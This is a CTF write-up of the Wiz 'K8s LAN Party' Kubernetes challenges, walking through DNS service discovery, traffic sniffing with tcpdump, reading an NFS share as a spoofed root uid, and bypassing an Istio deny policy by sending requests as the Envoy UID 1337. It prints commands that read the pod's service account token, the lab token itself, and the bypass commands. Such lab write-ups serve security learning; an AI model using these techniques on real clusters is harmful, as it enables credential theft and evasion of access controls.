Kubernetes CTF- WIZ K8s LAN Party

n00🔑
6 min read · Aug 20, 2024


Challenge: Recon

Statement-

DNSing with the stars
You have shell access to a compromised Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further.

As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have loaded your machine with dnscan to ease this process for further challenges.

All the flags in the challenge follow the same format: wiz_k8s_lan_party{*}

Checking current permissions-

 kubectl auth can-i --list

Environment variables-
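The environment can be dumped with env; Kubernetes injects *_SERVICE_HOST/*_PORT variables for cluster services, which is a quick way to spot internal endpoints:

env | sort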

Found these entries in the .kube folder (kubectl's API discovery cache; they are API group names rather than resolvable subdomains)-

acme.cert-manager.io
admissionregistration.k8s.io
apiextensions.k8s.io
apiregistration.k8s.io
authentication.k8s.io
authorization.k8s.io
cert-manager.io
certificates.k8s.io
coordination.k8s.io
crd.k8s.amazonaws.com
discovery.k8s.io
elbv2.k8s.aws
events.k8s.io
extensions.istio.io
flowcontrol.apiserver.k8s.io
install.istio.io
kyverno.io
networking.istio.io
networking.k8s.aws
networking.k8s.io
node.k8s.io
rbac.authorization.k8s.io
scheduling.k8s.io
security.istio.io
servergroups.json
storage.k8s.io
telemetry.istio.io
vpcresources.k8s.aws
wgpolicyk8s.io

Found Istio user in Linpeas output-

ISTIO

Kubernetes access token-

By default, service account tokens are mounted in a pod at the following location

/var/run/secrets/kubernetes.io/serviceaccount
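
Both the namespace and the token below can be read straight from that mount:

cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)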

namespace- k8s-lan-party

token-

eyJhbGciOiJSUzI1NiIsImtpZCI6IjM3NTcyZTczM2RmZjExYmUyNzIwOTgzNzBhMjgyOGE5MThiNGVmNjYifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTc1NTE3NTE2NSwiaWF0IjoxNzIzNjM5MTY1LCJpc3MiOiJodHRwczovL29pZGMuZWtzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2lkL0MwNjJDMjA3QzhGNTBERTRFQzI0QTM3MkZGNjBFNTg5Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJrOHMtbGFuLXBhcnR5IiwicG9kIjp7Im5hbWUiOiJhdHRhY2tlci1kZXBsb3ltZW50LTc2ZDg1OTA3LTZjODRjNDk0Nzkta2hwY3giLCJ1aWQiOiI2ZjQwZjJjMC1hYzFhLTQ1ZGEtOTVhNy05OGI5MDQyZTZmODAifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlZmF1bHQiLCJ1aWQiOiIxODc3ZTQyZC1hNWUxLTQ2NTctYjc2NC05YTMxMTA5ZWQwNjEifSwid2FybmFmdGVyIjoxNzIzNjQyNzcyfSwibmJmIjoxNzIzNjM5MTY1LCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6azhzLWxhbi1wYXJ0eTpkZWZhdWx0In0.GbDXYHusTMU_ZnEq9Q5xQn84rlIGNIKrPPSTDLm6RG1j2pwPTTEsxiSe9Y8fdH_UX2nWwwRmHmbaaqW-DqlvNOIEVAg3aZ6gWjrBXXcVmiAvmtBBxJv9ExvET-VbRNwhfbr9w84JiUJAUjV6G__KuC0Ob4kEkoHVKtNDgD7qK0m2t8DPpmexqgN9IecOAI94zBJRnZQkMXSch3-2opyqfelQGvrx6kf12aha8Q7QfJZjVOTvBrEaInocOeDxE9YBFzR1VLgRN06GPEkcwKTX6X51vibMTeLzudSojAgyuJVF9M5Bvl_xWh-6TayJd_jSlnEdOjQoRV1x7VnHGtaaQw

DNS server-

/etc/resolv.conf shows the cluster DNS server:

nameserver 10.100.120.34
  • The search directive specifies a list of domain suffixes that will be automatically appended to DNS queries when a hostname is not fully qualified (i.e., it doesn't have a dot in it).
  • The search domains are tried in order until a match is found.
  • For example, if you try to resolve the hostname webserver, the system will try the following:
  • webserver.k8s-lan-party.svc.cluster.local
  • webserver.svc.cluster.local
  • webserver.cluster.local
  • webserver.us-west-1.compute.internal

This is particularly useful in environments like Kubernetes, where services within the cluster might be resolved using shorter names.
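
Reconstructed from the expansions above, the pod's resolv.conf search line would be:

search k8s-lan-party.svc.cluster.local svc.cluster.local cluster.local us-west-1.compute.internal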

Running a reverse DNS sweep over the 10.100.0.0/16 service range-

seq 0 255 | xargs -P 50 -I {} bash -c 'for j in {0..255}; do dig -x 10.100.{}.$j +short | grep . && echo "10.100.{}.${j}"; done'
OR
dnscan -subnet 10.100.0.0/16
https://gist.github.com/nirohfeld/c596898673ead369cb8992d97a1c764e
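
A quick sanity check that PTR records exist at all (CoreDNS answers reverse queries for Service IPs; the nameserver's own IP from /etc/resolv.conf makes a convenient test target):

dig -x 10.100.120.34 +short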

Challenge: Finding Neighbours

Hello?
Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.

https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/

Using linpeas.sh for enumeration.

# Transfer linpeas to the container and add execute permissions to the binary
./linpeas.sh | tee linpeas.out
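
One way to get linpeas into the pod (a sketch, assuming the pod has outbound internet access and curl):

curl -sLO https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh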

In the linpeas output, we found that our current container has interesting Linux capabilities-

cap_net_admin and cap_net_raw
cat /proc/1/status | grep -i 'CapEff'
# CapEff: 0000000000003000

capsh --decode=0000000000003000
# 0x0000000000003000=cap_net_admin,cap_net_raw
Manually checking capabilities

A quick AI search (Bing Copilot) about these capabilities: cap_net_raw allows opening raw and packet sockets (i.e., packet sniffing), while cap_net_admin allows network administration tasks such as interface configuration and iptables changes.

Checking whether any network sniffing tools exist; tcpdump was found at /usr/local/bin/tcpdump.

Capturing network traffic -

tcpdump -i <interface> -w <output.pcap>
OR
tcpdump -v

Transferred this pcap to the local system, and upon analyzing the pcap we get the flag.

https://apackets.com/
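
Alternatively, since the flag format is known, it can sometimes be grepped straight out of a live capture (a shortcut, assuming the flag crosses the wire in cleartext):

tcpdump -i any -A 2>/dev/null | grep -o 'wiz_k8s_lan_party{[^}]*}'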

Based upon the HTTP response, we can see Istio is being used in the cluster.

Challenge: Data Leakage- Exposed File Share

The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦‍️.

Again going through the linpeas output-

/efs is a non-default directory that exists in the container.

Checking mounts in /proc/mounts-
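
A minimal filter for NFS entries:

grep -i nfs /proc/mounts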

Found flag.txt in the /efs share but didn't have permissions to read it.

No permissions

Let us try to remount the share onto another directory.
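
The attempt looked roughly like this (a sketch; the exact options weren't captured, and the export address comes from the nfs-ls step below):

mkdir /tmp/efs
mount -t nfs4 192.168.124.98:/ /tmp/efs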

mount has suid bit set

I was unable to mount this share, so I took a hint from the challenge.

Got to know about nfs-ls and nfs-cat (userspace NFS clients from the libnfs package). Because this share's access control is purely network-based, the client is free to assert any uid/gid, so we request uid=0-

nfs-ls 'nfs://192.168.124.98/?version=4&uid=0&gid=0'
nfs-cat 'nfs://192.168.124.98//flag.txt?version=4&uid=0&gid=0'

And after solving three challenges, I got a certificate-

https://k8slanparty.com/certificate/Vxk8520Y

Challenge: The Beauty and The Ist

Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don’t abuse this power; use it responsibly and with caution.

We have been provided with a policy-

apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: istio-get-flag
  namespace: k8s-lan-party
spec:
  action: DENY
  selector:
    matchLabels:
      app: "{flag-pod-name}"
  rules:
  - from:
    - source:
        namespaces: ["k8s-lan-party"]
    to:
    - operation:
        methods: ["POST", "GET"]

Running reverse DNS lookup again-

seq 0 255 | xargs -P 50 -I {} bash -c 'for j in {0..255}; do dig -x 10.100.{}.$j +short | grep . && echo "10.100.{}.${j}"; done'
OR
dnscan -subnet 10.100.0.0/16
istio-protected-pod-service.k8s-lan-party.svc.cluster.local. → 10.100.224.159
dnscan

Istio is an open-source service mesh that helps manage communication, security, and observability in microservices architectures. It provides a way to control how different parts of an application share data with one another.

Learning more about ISTIO -

https://www.youtube.com/watch?v=16fgzklcF7Y

https://www.aquasec.com/blog/istio-kubernetes-security-zero-trust-networking/

Security Issues in ISTIO -

Envoy runs as a user with UID 1337. The iptables rules direct all traffic in the pod to Envoy, except for traffic from the user with UID 1337. Therefore, to circumvent Envoy's control over outbound traffic, e.g. to prevent logging and monitoring of outbound requests, an attacker can perform requests as the user with UID 1337.

https://github.com/istio/istio/issues/4286
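
Since our pod holds cap_net_admin, these redirection rules can be inspected directly (a sketch; ISTIO_OUTPUT is the standard chain name installed by istio-init, and an owner-UID-1337 RETURN rule is what we expect to see):

iptables -t nat -L ISTIO_OUTPUT -n -v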

Bypassing the sidecar (and the DENY policy it enforces) by issuing the request as the istio user:

sudo -u istio curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
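
This works because the compromised pod runs as root and ships an istio user; its UID can be confirmed quickly (1337 is expected, matching Envoy's):

id istio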

Challenge: Who will guard the guardians?

Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.

Policy-

apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: apply-flag-to-env
  namespace: sensitive-ns
spec:
  rules:
  - name: inject-env-vars
    match:
      resources:
        kinds:
        - Pod
    mutate:
      patchStrategicMerge:
        spec:
          containers:
          - name: "*"
            env:
            - name: FLAG
              value: "{flag}"
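
In effect, any Pod admitted into sensitive-ns gets the flag injected as a FLAG environment variable. The mutation can be replayed offline with the Kyverno CLI (an illustration only; the kyverno binary, the file names, and the test manifest are my own assumptions, not artifacts from the challenge pod):

# save the policy above as policy.yaml, then create a minimal pod manifest
cat > pod.yaml <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: test
  namespace: sensitive-ns
spec:
  containers:
  - name: test
    image: busybox
EOF

# replay the mutation offline; the output spec should carry the injected FLAG env
kyverno apply policy.yaml --resource pod.yaml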
dnscan over the service range also surfaced the Kyverno services-

10.100.86.210 -> kyverno-cleanup-controller.kyverno.svc.cluster.local.
10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.

I was unable to solve past this point for now.


Written by n00🔑

Computer Security Enthusiast. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/ Instagram @pswalia4u
